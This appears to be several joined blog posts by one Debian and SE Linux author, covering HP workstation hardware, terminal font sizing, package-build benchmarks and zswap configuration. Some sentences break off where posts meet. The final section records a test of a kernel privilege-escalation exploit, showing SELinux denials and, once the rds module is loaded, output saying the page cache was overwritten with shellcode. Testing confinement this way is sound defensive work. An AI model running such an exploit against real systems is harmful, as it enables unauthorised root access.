One interesting thing is that it has an adaptor from SATA power to 8 pin PCIe power. According to Wikipedia the 8 pin connector provides 150W at 12V [2]. According to Wikipedia SATA power cables include 3 12V pins each of which can deliver 1.5A [3] which is 54W. The system as I received it had a single SATA power plug connected so potentially 150W could be drawn from a connector designed for 54W. The first thing I did was to connect a second SATA power connector on the same cable so I could have connectors designed for a total of 108W supplying potentially 150W (and definitely more than 75W).
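The arithmetic behind those figures can be sketched as below. This is only an illustration using the numbers quoted above (3 pins at 12V, 1.5A per pin); the function name `sata_power_watts` is made up for the example.

```shell
# Power available from a number of SATA power connectors, in watts.
# Assumes the figures quoted above: 3 pins at 12V, each good for 1.5A.
sata_power_watts() {
    connectors=$1
    pins=3
    volts=12
    milliamps_per_pin=1500   # 1.5A expressed in mA so integer maths works
    echo $(( connectors * pins * volts * milliamps_per_pin / 1000 ))
}

sata_power_watts 1   # prints 54
sata_power_watts 2   # prints 108
```

Even with two connectors the 108W total is still below the 150W that the 8 pin PCIe connector is specified for.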
I found two versions of the specs for this system, this version seems to match what I bought as it references W-21xx CPUs [4] while this version matches what I would rather have with a W-22xx CPU [5]. The URL naming scheme implies that there are potentially at least a few other variants out there. So much for the “buy name brand and you can buy two systems with the same model and have them work the same” benefit you hope to get. Why don’t they just name them “G4.1”, “G4.2”, etc?
It seems that W-21xx and W-22xx CPUs are incompatible, so the W-2295 scoring 30,804 multithread and 2,634 single thread on passmark that I hoped to get isn’t an option [6].
The system is well designed for space efficiency. Both it and the Z640 are 17cm wide but the Z4G4 allows me to close the lid with the Intel Battlemage card installed, which doesn’t come close to fitting in a Z640. It has 8 DIMM sockets and with the ready availability of 32G DIMMs that allows 256G of RAM which is the maximum the motherboard supports. That compares well to the Z640 that only has 4 DIMM slots and the Z6G4 which only has 6.
The system supports a maximum RAM speed of DDR4-2666 which is better than the DDR4-2400 of the Z640 but less than the DDR4-2933 of the Z6G4.
The NVMe sockets on the motherboard are a convenient feature. Most systems I run need at most two NVMe devices so this saves a PCIe slot which is important when dealing with GPUs that take 2+ slots. Also for systems that don’t really need NVMe I can use some of the small NVMe devices that I have no other use for. 128G NVMe devices aren’t even worth selling and 256G will be of little use in the near future. So when I move to gen4 Z servers I can use up some of them without wasting slots.
Using the lesser socket LGA2066 in the Z4G4 is a minor annoyance, but for a single socket system 18 cores is probably enough.
The BIOS has an option for single-socket NUMA, which is basically locking cores in a single CPU to specific RAM channels. I enabled it but it did nothing presumably because I only have 2 DIMMs. When I get more DIMMs I’ll do some tests of that and compare it with NUMA on my Z840.
There are many different variants of the Z4G4 and the only way to recognise them is by the CPU not by any part number or serial number AFAIK. The first difference is between server grade CPUs (the W-2xxx CPUs) and desktop grade CPUs (the i7 and i9 CPUs). The systems with i7 and i9 CPUs don’t support ECC RAM which makes them less reliable, gives smaller limits for RAM
The below table compares the Z640 which is my current desktop PC with the Z4G4, Z6G4, and Z8G4 systems. For the latter 3 I have included multiple options for the parts that differ in different models in the same name series. The Z4G4 I have is an early one which only supports W-21xx CPUs which means a maximum RAM speed of 2666 and the best possible CPU would only be 15% faster than my Z640. I can only use this for ML stuff as it’s the only system I have with REBAR support (which works well).
| | Z640 (1 socket) | Z4G4 | Z6G4 (1 socket) | Z8G4 |
|---|---|---|---|---|
| DIMM slots | 4 | 8 | 6 | 24 |
| Max DDR4 speed | 2400 | 2666/2933 | 2666/2933 | 2666/2933 |
| Max DIMM size | 32G | 64G | 64G | 64G/128G |
| System Max Ram | 128G | 512G | 192G/384G | 1.5T/3T |
| CPU Socket | LGA2011-3 | LGA2066 | LGA3647 | LGA3647 |
| Best CPU | E5-2699A v4 | W-2195/W-2295 | Platinum 8180/W-3275 | Platinum 8180/8280 |
| Motherboard NVMe | 0 | 2 | 2 | ? |
In my previous blog post I concluded that the next step up for me would be DDR5 systems [10]. But now some of the LGA3647 systems are appealing. The Z8G4 would be a decent upgrade from my current Z840 build server and should be affordable long before any two socket DDR5 system becomes affordable.
The Z4G4 doesn’t have any potential for useful upgrades. But for me it was a good cheap way to house a GPU that had already damaged the motherboard of one good system. If the Z4G4 has a PCIe slot break the way my Z840 did then it wouldn’t bother me a lot. It was annoying to discover how limited this variant of the Z4G4 is after buying it, but at that price I can’t complain.
A Z6G4 could be a nice workstation if I found one at a really low price. The only reason I’d seek one out is if I had a need for a desktop workstation with REBAR support, which seems unlikely.
In 2019 I blogged about getting a 4K monitor because of my vision being inadequate for a 2560*1440 monitor [1]. Now I’m using a 40″ 5120*2160 monitor [2] and still trying to find the correct balance between how much I want to see on the screen and what I am physically capable of seeing on screen.
Currently Kitty is my terminal emulator of choice [3]. What I most like about it is the feature of having multiple terminal windows in a single OS window, so instead of having 9 or 16 different xterm instances running, all with possible alignment issues, I have a single window for all terminals which can be brought to the foreground. The impending 6.7 release of KDE (my favourite Linux desktop environment) [4] includes the feature of per-screen virtual desktops which might be the feature I need to make multiple monitors usable for me. One of the factors stopping me from using multiple monitors in the past was the issue of not getting the alignment of dozens of xterms right if a monitor goes to sleep mode and is regarded as disconnected. Moving a few Kitty windows is much easier than moving dozens of xterms (also a tiling window manager isn’t my style).
I’ve just decided that the Terminus font (my favourite out of the monospaced fonts in Debian) is too small for me at 9.0 point. But then I tried 10.0 which looked really ugly and an experiment showed that 10.5 looked good.
This is the best explanation I’ve seen of how ridiculous the whole font point thing is [5]. It doesn’t and won’t ever correlate to pixels. So what we ideally want to do is set the size on screen to match the actual pixel size of the font. I can’t find any software to interrogate a font file and find out what sizes it supports. The web page for the Terminus font says that it supports 6×12, 8×14, 8×16, 10×18, 10×20, 11×22, 12×24, 14×28 and 16×32 [6]. So the question is how to get a terminal program that uses one of those.
Kitty doesn’t and won’t support specifying font size by pixel. I tried some other terminal programs, starting with the Debian Wiki page TerminalEmulator [7] which wasn’t very helpful, so I added some new entries to that page. There doesn’t seem to be another option for a terminal emulator with multiple terminals in one OS window that can arrange them automatically. I didn’t even get to the stage of checking whether other terminal emulators supported font size in pixels.
The lcdf-typetools package contains the program otfinfo which gives some interesting information on fonts but nothing about the font sizes in pixels.
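One possible starting point for finding bitmap sizes is fontconfig, which records a `pixelsize` property for non-scalable fonts. The sketch below is untested against Terminus and assumes that fontconfig on the system is configured to expose bitmap fonts at all. The function name `bitmap_sizes` is made up for the example and it only filters text, the `fc-list` call that would feed it is shown in a comment.

```shell
# Print the distinct pixel sizes listed for one bitmap font family.
# Input on stdin: lines of "family<TAB>pixelsize", which could come from
#   fc-list --format '%{family}\t%{pixelsize}\n' ':scalable=false'
# (assumes fontconfig exposes bitmap fonts on this system).
bitmap_sizes() {
    family=$1
    awk -F '\t' -v fam="$family" '$1 == fam && $2 != "" { print $2 }' |
        sort -n -u
}

# Example:
#   fc-list --format '%{family}\t%{pixelsize}\n' ':scalable=false' |
#       bitmap_sizes Terminus
```

This only reports the height in pixels, not the width×height pairs that the Terminus web page lists.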
Sites like Coding Font to compare fonts [8] can never work properly as the fonts will always be slightly different sizes as the same point size doesn’t mean the same display size.
On my 5120*2160 monitor with 9 Kitty terminal sessions with 9.0 point font they each have 277*50 characters. With 10 point it’s 237*46 but fuzzy and unpleasant to read. With 10.5 point it’s 208*43 which isn’t as good as I’m used to but is still almost 4.5* as many characters as the original 80*25 standard for terminals.
Some time before 2019 I had a 4*4 array of terminal windows that were 100*25 or 120*25. That left some space at the right and bottom so I could open another 8 or 9 terminals that were partially obscured if I needed to. By 2019 before getting a 4K monitor I had a 3*3 array of terminal windows as my standard desktop and a larger monitor that did 4K resolution allowed me to have 16+ terminals again. Now with Kitty I routinely have 9 terminals in a 3*3 array and I can easily open more if I need them and have them resize appropriately.
This situation works reasonably well, but the element of just trying different sizes in 0.5 point increments until I find something that looks good is unpleasant. I should be able to specify the next largest increment of the bitmaps in the font and just have it look good.
It would be good if more people tested the terminal emulators in Debian and added information to the wiki page about them. The current page is useful but needs more information to support the variety of features that people find important.
We need some tools to provide information on fonts in Debian, such as the sizes of bitmapped fonts.
The whole point size thing is just wrong and would ideally go away. The vast majority of font use nowadays is for things that will probably never end up on a printed page so trying to map it to a physical size in fractions of an inch makes no sense. But that’s just one of many horrible things used for backwards compatibility that aren’t going to go away any time soon. Really everything involving inches should go away.
I have just bought a HP Z4 G4 with W-2125 CPU for $320 and I decided it was a good time to do some benchmarks on Debian package building to see which system I should use for that.
The W-2125 CPU scores only 9,954 on the passmark multithread test but scores 2,546 on single thread [1]. Passmark seems to have some limitations as the only DDR3 system that’s important to me at the moment (the HP Z420 workstation my parents use which cost me $750 in 2021) has a E5-2620 CPU which scores 5,325 for multithread and 1,113 for single thread [2]. From the passmark results one would expect that the Z4 G4 is slightly more than twice as fast as the Z420 for operations that involve less than 4 CPU cores.
For the initial tests of the Z4 G4 I ran them with hyper-threading enabled as 4 cores isn’t much by today’s standards and also the machine in question is going to be less exposed to hostile data and contain less secret data than most of my systems so the security risks of hyper-threading are less of a concern.
I did some tests with a couple of tasks that are very important to me, building SE Linux policy packages (something I may do a dozen times in a day) and building Warzone 2100 (which I do less often but is the most intensive build process I regularly run). At the bottom of this post there are tables with the results from building these packages on my Z640 workstation with a E5-2696 v4 CPU [3], the Z420, and the new machine.
For the Warzone 2100 package I tested building on my Z840 dual CPU system [4]. I didn’t test building the SE Linux policy on the Z840 this time because that package can’t take advantage of even 22 cores. When I initially got the Z840 running it built the policy packages faster because the Z640 had an older CPU that was slower for single core operations than the CPUs in the Z840.
For some time I have noticed significant differences in compile time on my workstation, a factor of more than 2. I did more tests and noticed that “top” showed something like the following, those kernel threads are all BTRFS related, except for “gfx” which is probably something graphical caused by running Chrome with about 300 tabs open.
    2144316 root 20 0 0 0 0 I 26.6 0.0 0:36.76 kworker/u88:20-btrfs-endio-write
    2221470 root 20 0 0 0 0 I 23.7 0.0 0:01.85 kworker/u88:12-gfx
    2221436 root 20 0 0 0 0 I 15.1 0.0 0:07.48 kworker/u88:8-btrfs-compressed-write
    2166191 root 20 0 0 0 0 I 12.8 0.0 0:15.80 kworker/u88:23-btrfs-compressed-write
    2126387 root 20 0 0 0 0 I 10.2 0.0 1:29.11 kworker/u88:4-events_unbound
I had been running BTRFS with the mount option “compress=zstd:15” which caused many of the performance problems when building. It was also a random performance issue, which I think happened because the BTRFS 30 second write-back sometimes took more than 30 seconds during the build process, which then caused a second write-back.
I did tests on ZSTD compression levels 5, 8, 10, and 15. 15 was never good and often really bad. 10 was not unbearable but consistently slower. 8 was sometimes as fast as 5 and sometimes quite a bit slower. I didn’t test levels below 5 because I need to have some compression and it seemed that the benefits of reducing compression were dropping off below 8.
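Switching between levels for tests like these can be done with a remount, which only affects data written afterwards. The following is a minimal sketch and not the exact procedure used for the tests above. The helper name `zstd_mount_option` and the `/build` mount point are made up for the example, and the 1 to 15 range is the long standing range of BTRFS zstd levels.

```shell
# Build the BTRFS mount option for a given zstd level.
# Rejects anything outside the 1 to 15 range.
zstd_mount_option() {
    level=$1
    case $level in
        ''|*[!0-9]*) echo "level must be a number" >&2; return 1 ;;
    esac
    if [ "$level" -lt 1 ] || [ "$level" -gt 15 ]; then
        echo "zstd level must be between 1 and 15" >&2
        return 1
    fi
    echo "compress=zstd:$level"
}

# Example (as root, /build is a hypothetical mount point):
#   mount -o "remount,$(zstd_mount_option 5)" /build
```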
I found that the BTRFS compression delay is not counted in system time for the process. I think it’s the fsync() system calls in the semodule and dpkg-deb programs that cause the delays related to BTRFS compression waiting for kernel threads.
I have all my systems other than laptops running BOINC in the background so that CPU power is used for scientific research when I don’t have any personal use for it [5]. I believe that it’s immoral to waste CPU power when it could be used for research.
The table below has test results from building the package with and without BOINC and with different ZSTD compression levels in BTRFS. All the worst entries were from when BOINC was running, apart from one where ZSTD level 15 compression was used. The really poor performance with ZSTD level 15 was an outlier, but it wasn’t an uncommon outlier so I left it in.
Running BOINC in the background configured to use all CPU cores caused a significant increase in “user CPU time” (the time a CPU core spent actually running the program). My initial thought was that it’s partly related to “turbo boost”.
The Intel ARK page for the CPU in the Z420 shows that its main clock speed is 2.0GHz with a 2.5GHz “turbo boost” [6]. The “turbo boost” is apparently largely based on temperature and apparently limited to one core, so if the other CPU cores are all being used then the CPU will probably be too hot to have the turbo boost and if it happens it might not happen for my compile processes.
The ARK page for the E5-2699 v4 (which is a similar CPU to the E5-2696 v4 that I’m using but is officially documented by Intel) [7] shows that it has a base clock speed of 2.2GHz and a turbo boost speed of 3.6 GHz. 322 vs 244 seconds of user CPU time means running 32% slower which can plausibly be explained by the lack of a 64% turbo boost with a bit of help from the 55MB L3 cache being thrashed.
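The two percentages above come from simple ratios. As a small sketch (the function name `percent_more` is made up for the example), using the user CPU times from the Z640 level 5 rows of the table and the clock speeds from the ARK page:

```shell
# Percentage by which the first value exceeds the second, rounded.
percent_more() {
    awk -v a="$1" -v b="$2" 'BEGIN { printf "%.0f\n", (a / b - 1) * 100 }'
}

percent_more 322.40 244.75   # user CPU seconds with vs without BOINC: prints 32
percent_more 3.6 2.2         # turbo clock vs base clock in GHz: prints 64
```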
Turbo boost would only be a noticeable issue for building packages like the SE Linux policy packages which don’t take much advantage of multi-core CPUs. For a build process to average at best 362% CPU use there have to be large parts of the process that are limited to one or two cores which can potentially benefit from turbo boost.
When building the Warzone 2100 packages most of the build time is running basis-universal which is a multi-threaded program to compress GPU texture data. This usually causes a load average of 300+ on the Z640 or 600+ on the Z840. But the build time is still increased by more than 50% on both the Z640 and the Z840 when BOINC is running in the background, which seems to be an indication that it’s not related to turbo boost. I verified that BOINC is running at IDLE schedule priority with the following command:
    # chrt -p $(pidof -s einstein_O4MD_2.01_x86_64-pc-linux-gnu)
    pid 2974874's current scheduling policy: SCHED_IDLE
    pid 2974874's current scheduling priority: 0
In theory this means that BOINC won’t affect foreground processes.
The best claims I’ve seen about HT are 15% to 30% performance boost. The best I’ve actually seen in the past is about 18%. Seeing a 10% benefit for building Warzone 2100 is at the low end of the range I expected. 8 virtual cores is not many for a build process that causes a load average of 600+ when running on a system with 44 real cores.
I was surprised to see a 6% performance benefit in hyper-threading for building the SE Linux policy as I didn’t think there was enough use of threading or multiple processes to allow that.
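The hyper-threading percentages can be worked out from the elapsed times in the tables at the end of this post. The following sketch shows one way to do it. The function names are made up for the example, and it measures the benefit as the reduction in elapsed time, which is an assumption about how the figures above were derived.

```shell
# Convert "M:SS.ss" as printed by time(1) into seconds.
elapsed_to_seconds() {
    echo "$1" | awk -F: '{ printf "%.2f\n", $1 * 60 + $2 }'
}

# Percentage reduction in elapsed time going from the slow run to the fast run.
time_saved_percent() {
    slow=$(elapsed_to_seconds "$1")
    fast=$(elapsed_to_seconds "$2")
    awk -v s="$slow" -v f="$fast" 'BEGIN { printf "%.1f\n", (s - f) / s * 100 }'
}

time_saved_percent 19:59.01 17:48.03   # Warzone 2100, level 5: prints 10.9
time_saved_percent 1:35.01 1:29.63     # refpolicy, level 10: prints 5.7
```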
Many build scripts use a number of processes that matches the number of apparent CPU cores. While “make -j 88” might give a theoretical performance benefit on a 44 core system it will also take a lot of RAM and any paging will outweigh the benefits of hyper-threading. On a system with only 4 real cores there’s less potential for using too much RAM and as security isn’t so important on that system I will leave hyper-threading enabled.
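One way to avoid paging is to cap the job count by available RAM as well as by core count. This is only a sketch: the function name `pick_jobs` is made up, and the memory needed per job is a guess that has to be measured for each package.

```shell
# Choose a make job count: the smaller of the CPU count and what RAM allows.
# per_job_mb is an assumed peak memory use per compiler process.
pick_jobs() {
    cpus=$1
    mem_mb=$2
    per_job_mb=$3
    by_mem=$(( mem_mb / per_job_mb ))
    if [ "$by_mem" -lt 1 ]; then
        by_mem=1
    fi
    if [ "$by_mem" -lt "$cpus" ]; then
        echo "$by_mem"
    else
        echo "$cpus"
    fi
}

# Example: 88 apparent cores, 64G of RAM, 2G assumed per job gives 32 jobs.
#   make -j "$(pick_jobs 88 65536 2048)"
```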
The best results of the Z640 and Z4G4 are only 50% faster than the best results of the Z420.
The Z420 has a E5-2620 CPU which is far from the fastest CPU available for that system – the E5-2687W has 8 cores and rates 10,021/1,669 on passmark [8] which is far better than the 5,331/1,114 of the E5-2620. The E5-2687W is the fastest CPU that HP lists as supported by the Z420 and it supports DDR3-1600 RAM as opposed to the DDR3-1333 that is the fastest that the E5-2620 supports. With suitable hardware upgrades the Z420 would probably only take about 20% longer to do builds of the SE Linux policy and other packages that can’t take advantage of more than 8 CPU cores.
The Z4G4 system has 4 RAM channels which means that you should get some performance benefits from having 4 DIMMs. My system currently has 2 and I haven’t yet managed to get more DDR4-2666 DIMMs. But I’d still have expected a W-2125 CPU with 2*DDR4-2666 DIMMs to outperform any E5-26xx CPU with 4*DDR4-2400 DIMMs for tasks that average less than 4 CPU cores.
In retrospect I would have been better off getting a HP Z820 (two socket server with DDR3 RAM) than the first DDR4 systems I got. It seems that for reasonable size builds a two socket system comes close to twice the speed of a single socket system. I did briefly own a HP ML350 two CPU system with DDR3 RAM but it was too noisy for my intended use as a deskside workstation so I sold it.
I plan to do more investigation on BTRFS compression, how to get the best compression without excessive delays and how to recognise when delays are happening. I have some SSDs that have sustained write speeds as low as 15MB/s (Crucial P1 series) so for those I could probably have very high compression levels without slowing the system down.
The fact that BOINC slows things down so much seems to be a bug. When processes are running with the IDLE scheduling class there shouldn’t be such significant delays. Is it due to cache thrashing? How can I best get BOINC suitably throttled when I’m sitting at my workstation? I don’t want BOINC connecting to the local X server (which it repeatedly tries to do). Do I need to tune my kernel for better handling of IDLE scheduling?
When I get more DIMMs in the Z4G4 I need to do more tests to see if it gives an overall performance boost.
Also the Z4G4 system has a BIOS option for “sub NUMA” which basically means treating the different RAM channels on a single CPU as NUMA zones. I enabled that option but it does nothing, presumably because I only have 2 DIMMs. The results when I have 4 DIMMs will be interesting. I will also do some NUMA tests on the Z840 to see what benefits it gives.
I have a selection of RAM speeds that will work in the Z4G4, if I have enough spare time I’ll test what difference that makes for CPU bound tasks that matter to me.
For package building fsync() is not helpful. If the system crashes before the build is done then I will just do the build again. For a build cluster it is probably a good feature and probably doesn’t affect aggregate performance when multiple packages are built at the same time, but for the single user case it probably isn’t. I will investigate libeatmydata for package building [9].
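As a rough sketch of how that could look, the `eatmydata` wrapper command from the eatmydata package runs a program with fsync() and related calls turned into no-ops. The function name `build_without_fsync` is made up for the example, and this has not been benchmarked against the builds above.

```shell
# Run a build command under eatmydata when it is installed,
# otherwise run the command unchanged.
build_without_fsync() {
    if command -v eatmydata >/dev/null 2>&1; then
        eatmydata "$@"
    else
        "$@"
    fi
}

# Example:
#   build_without_fsync dpkg-buildpackage -us -uc -b
```

Falling back to the plain command means the same build script works on systems where the package isn’t installed.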
The progress in CPUs seems to have slowed down a lot recently. The main benefits seem to be in more CPU cores and for newer sockets with more RAM channels.
The CPUs that do have improvements in single core performance are the i9 series (which mostly doesn’t come with motherboards supporting ECC) and AMD CPUs (which are rare in enterprise class hardware). Maybe I should get a server with an i9 or AMD CPU for tasks that need a fast turn around with a small number of cores. That would probably outperform any CPU designed for large core counts for things like building the policy and setting up test VMs (which depends on package installation speed that is single core bottlenecked).
The W-21xx CPUs seem to offer little benefit over the E5-26xxv4 CPUs and not a lot of benefit over E5-26xx CPUs (with DDR3). Even the W-22xx CPUs look like they aren’t going to offer a lot as they are only an incremental improvement over the W-21xx series. I had considered making the Z4G4 my main desktop workstation after the high end W CPUs become affordable, but it looks like that won’t be worth it until such CPUs drop from the current ebay price of $900 to $100.
I think I’ll keep waiting for a decent socket LGA3647 or DDR5 based server [10] for my next significant upgrade.
| System | BOINC | Compression | CPU Time | Elapsed | CPU% |
|---|---|---|---|---|---|
| Z640 | no | 8 | 248.82user 55.58system | 1:23.88elapsed | 362%CPU |
| Z4G4 | no | 5 | 245.15user 34.63system | 1:24.93elapsed | 329%CPU |
| Z640 | no | 5 | 244.75user 34.87system | 1:25.98elapsed | 325%CPU |
| Z4G4 | no | 10 | 245.21user 35.64system | 1:29.63elapsed | 313%CPU |
| Z640 | no | 8 | 248.71user 55.90system | 1:33.01elapsed | 327%CPU |
| Z640 | no | 10 | 250.90user 55.78system | 1:42.12elapsed | 300%CPU |
| Z640 | yes | 8 | 298.19user 69.30system | 1:59.77elapsed | 306%CPU |
| Z640 | yes | 10 | 300.58user 68.90system | 2:01.53elapsed | 304%CPU |
| Z420 | no | 5 | 359.01user 44.95system | 2:07.33elapsed | 317%CPU |
| Z640 | yes | 5 | 322.40user 71.82system | 2:34.66elapsed | 254%CPU |
| Z420 | yes | 5 | 372.03user 42.95system | 2:42.15elapsed | 255%CPU |
| Z640 | yes | 15 | 299.26user 67.18system | 2:59.77elapsed | 203%CPU |
| Z640 | no | 15 | 250.05user 54.60system | 3:07.61elapsed | 162%CPU |
| System | BOINC | Compression | CPU Time | Elapsed | CPU% |
|---|---|---|---|---|---|
| Z840 | no | 10 | 6549.21user 89.46system | 4:18.90elapsed | 2564%CPU |
| Z840 | no | 5 | 6533.81user 90.50system | 4:19.24elapsed | 2555%CPU |
| Z640 | no | 5 | 7040.87user 183.12system | 7:13.50elapsed | 1666%CPU |
| Z840 | yes | 5 | 8039.52user 169.62system | 8:02.86elapsed | 1700%CPU |
| Z640 | yes | 5 | 7486.44user 205.03system | 11:09.97elapsed | 1148%CPU |
| Z4G4 | no | 5 | 7891.32user 74.45system | 17:48.03elapsed | 745%CPU |
| Z4G4 | no | 10 | 7942.10user 77.43system | 17:58.72elapsed | 743%CPU |
| Build | HT | Compression | CPU Time | Elapsed | CPU% |
|---|---|---|---|---|---|
| Warzone | yes | 5 | 7891.32user 74.45system | 17:48.03elapsed | 745%CPU |
| Warzone | yes | 10 | 7942.10user 77.43system | 17:58.72elapsed | 743%CPU |
| Warzone | no | 5 | 4492.45user 59.09system | 19:59.01elapsed | 379%CPU |
| Warzone | no | 10 | 4497.28user 59.46system | 20:07.15elapsed | 377%CPU |
| Refpolicy | yes | 5 | 245.15user 34.63system | 1:24.93elapsed | 329%CPU |
| Refpolicy | yes | 10 | 245.21user 35.64system | 1:29.63elapsed | 313%CPU |
| Refpolicy | no | 5 | 180.84user 29.74system | 1:32.30elapsed | 228%CPU |
| Refpolicy | no | 10 | 180.29user 30.07system | 1:35.01elapsed | 221%CPU |
The Register has an informative article about the threat that management systems built in to Intel and AMD CPUs pose to data sovereignty in EU owned cloud providers [4]. But this is just the first stage of building sovereign clouds, all significant cloud services run at least 2 types of CPU and adding EU manufactured CPUs at a future time will be easy.
Michael Prokop wrote an interesting blog post about debugging input event problems on Linux which turned out to be due to an analogue headphone connection [8]. This gave me some useful pointers to investigating an input device problem which is probably very different.
Tianon Gravi wrote an informative blog post about containers, Debian, and Docker options [12]. We need a lot more work on these sorts of things in Debian.
Last year I blogged about using Zram for VMs [1]. That setup is still working well for VMs and for phones and laptops with no swap device.
I have just read Chris Down’s insightful blog post about Zswap vs Zram [2] which convinced me to set up Zswap on some systems. I have had some of the problems that were described in his blog post when trying to run Zram on workstation and server systems.
One limitation of zswap is that it doesn’t allow specifying the compression level. For zram I can put the following in /etc/systemd/zram-generator.conf to set the zstd compression level (this works well on my Thinkpad X1 Carbon Gen6):
    [zram0]
    compression-algorithm=zstd(level=10)
For the BTRFS filesystem I can put “compress=zstd:13” in the mount options to specify the compression level. They really should support different compression levels in zswap. The ideal compression level depends on the speed of the CPU and new CPUs keep getting faster.
The documentation says to use something like the following on the kernel command-line to enable zswap:
zswap.enabled=1 zswap.compressor=zstd zswap.max_pool_percent=20 zswap.shrinker_enabled=1
The max_pool_percent=20 setting is the default which means to use up to 20% of system RAM for compressed data. I’ve seen documentation suggesting up to 50% which seems a little excessive.
Note that a lot of documentation says to use zswap.zpool=z3fold, but z3fold is going to be removed and zsmalloc (the default) is recommended [3].
There is documentation about changing the compression algorithm via command line parameters. On Debian only lzo is linked in to the kernel and zstd (my preferred option) is a module, so the kernel command line can’t be used to set zstd, but the following command works:
echo zstd > /sys/module/zswap/parameters/compressor
The shrinker_enabled option is to allow the kernel to evict cold pages without waiting for memory pressure.
You can enable zswap without rebooting by running commands like the following. You could even put them in /etc/rc.local or something, but I think putting it in the kernel command line is a good idea as it makes it obvious to the next sysadmin what is happening.
    echo 1 > /sys/module/zswap/parameters/enabled
    echo zstd > /sys/module/zswap/parameters/compressor
    echo 1 > /sys/module/zswap/parameters/shrinker_enabled
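To check that the settings took effect, the same parameter files can be read back. The following is a small sketch. The function name `zswap_params` is made up, and the optional directory argument is only there so it can be tried against a copy of the files.

```shell
# Print each zswap parameter as name=value.
# Reads the live sysfs directory unless another directory is given.
zswap_params() {
    dir=${1:-/sys/module/zswap/parameters}
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        printf '%s=%s\n' "$(basename "$f")" "$(cat "$f")"
    done
}

# Example:
#   zswap_params | grep -E '^(enabled|compressor|shrinker_enabled)='
```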
The following command is documented as a way of finding out what zswap is doing:
    # grep -r . /sys/kernel/debug/zswap/
    /sys/kernel/debug/zswap/stored_pages:262541
    /sys/kernel/debug/zswap/pool_total_size:455266304
    /sys/kernel/debug/zswap/written_back_pages:384
    /sys/kernel/debug/zswap/reject_compress_poor:0
    /sys/kernel/debug/zswap/reject_compress_fail:160911
    /sys/kernel/debug/zswap/reject_kmemcache_fail:0
    /sys/kernel/debug/zswap/reject_alloc_fail:0
    /sys/kernel/debug/zswap/reject_reclaim_fail:0
    /sys/kernel/debug/zswap/pool_limit_hit:0
The following command gives the zswap compression ratio (uncompressed size of the stored pages divided by the RAM used for the pool), which is 2.36 for this example:
echo "scale=2; " $(</sys/kernel/debug/zswap/stored_pages) " * $(getconf PAGESIZE) /" $(</sys/kernel/debug/zswap/pool_total_size) | bc
This table documents my current understanding of the debug values. The difference between reject_compress_fail and reject_compress_poor isn’t clear in a lot of the documentation, even reading the source didn’t make it easy to understand.
| File | Meaning (LC is lifetime count) |
|---|---|
| pool_limit_hit | LC pool limit hit and pages are forced to the swap partition |
| pool_total_size | RAM used for zswap data |
| reject_alloc_fail | LC can’t allocate memory because max_pool_percent has been reached |
| reject_compress_fail | LC of pages with a compression algorithm failure so go straight to swap partition |
| reject_compress_poor | LC of pages that can’t compress so go straight to swap partition |
| reject_kmemcache_fail | LC kernel malloc failure (serious problem?) |
| reject_reclaim_fail | LC failure to move a page from compressed RAM to disk – serious problem! |
| stored_pages | Swapped pages stored by zswap |
| written_back_pages | LC of pages written back to swap partition from zswap |
All of this is not nearly as easy to understand as the following command for zram:
    # zramctl
    NAME       ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
    /dev/zram0 zstd          7.7G 2.1G  375M  386M       4 [SWAP]
The Debian Wiki page about Zswap is very brief [4] and needs more description about this. I think a lot of Debian users will use zram instead of zswap because setting up zram is just a single apt command. I’m not planning to immediately add to that wiki page because I’m not an expert on this, and I would appreciate comments on this blog post from others who have got zswap working. I will update the wiki if others report matching experiences to mine.
I’m now using zswap on a few systems including my main home workstation which had performed poorly with zram and a swap device in the past. If that goes well I’ll put it on other systems.
I wrote the following shell script to display zswap stats, consider it GPL if you want to use it:
    #!/bin/bash
    if [ ! -f /sys/kernel/debug/zswap/stored_pages ]; then
      echo "ZSwap not enabled"
      exit 0
    fi
    PAGES=$(</sys/kernel/debug/zswap/stored_pages)
    PAGESIZE=$(getconf PAGESIZE)
    RAM=$(echo "$PAGESIZE * " $(getconf _PHYS_PAGES) | bc)
    POOL=$(</sys/kernel/debug/zswap/pool_total_size)
    if [ "$POOL" == "0" ]; then
      echo "ZSwap not used yet"
      exit 0
    fi
    COMP=$(</sys/module/zswap/parameters/compressor)
    echo -n "$COMP compression ratio: "
    echo "scale=2; $PAGES * $PAGESIZE / $POOL" | bc
    echo -n "RAM%: "
    echo "100 * $POOL / $RAM" | bc
When I run the exploit as user_t I see the following in the audit log:
type=PROCTITLE msg=audit(1779615031.043:15540): proctitle="./exp"
type=AVC msg=audit(1779615031.043:15541): avc: denied { create } for pid=1360 comm="exp" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=rds_socket permissive=0
type=SYSCALL msg=audit(1779615031.043:15541): arch=c000003e syscall=41 success=no exit=-13 a0=15 a1=5 a2=0 a3=0 items=0 ppid=879 pid=1360 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="exp" exe="/home/test/b/pocs/pintheft/exp" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"
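The SYSCALL record prints the syscall arguments in hexadecimal, so a0=15 is decimal 21 which is AF_RDS on Linux, and a1=5 is SOCK_SEQPACKET. That matches the rds_socket class in the AVC record. A small sketch for pulling fields out of such a record follows; the function names are made up for the example.

```shell
# Extract a named field (for example a0) from an audit record on stdin.
audit_field() {
    name=$1
    tr ' ' '\n' | awk -F= -v n="$name" '$1 == n { print $2; exit }'
}

# Audit records print syscall arguments in hexadecimal.
hex_to_dec() {
    printf '%d\n' "0x$1"
}

# Example with a shortened copy of the record above:
line='type=SYSCALL msg=audit(1779615031.043:15541): arch=c000003e syscall=41 success=no exit=-13 a0=15 a1=5 a2=0'
hex_to_dec "$(echo "$line" | audit_field a0)"   # prints 21
```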
The last of the output of running the exploit is the following:
    [-] only stole 0/1024 refs - may not be enough
    [-] too few stolen refs, aborting
    [-] attempt 5 failed, retrying...
    [-] all 5 attempts failed
When I run it as unconfined_t it gave the same output and stracing it had many of the following:
socket(AF_RDS, SOCK_SEQPACKET, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)
After I ran “modprobe rds” the exploit worked as unconfined_t with the following output:
    [*] verifying page cache overwrite...
    [*] page cache page 0 AFTER overwrite (our shellcode) (129 bytes):
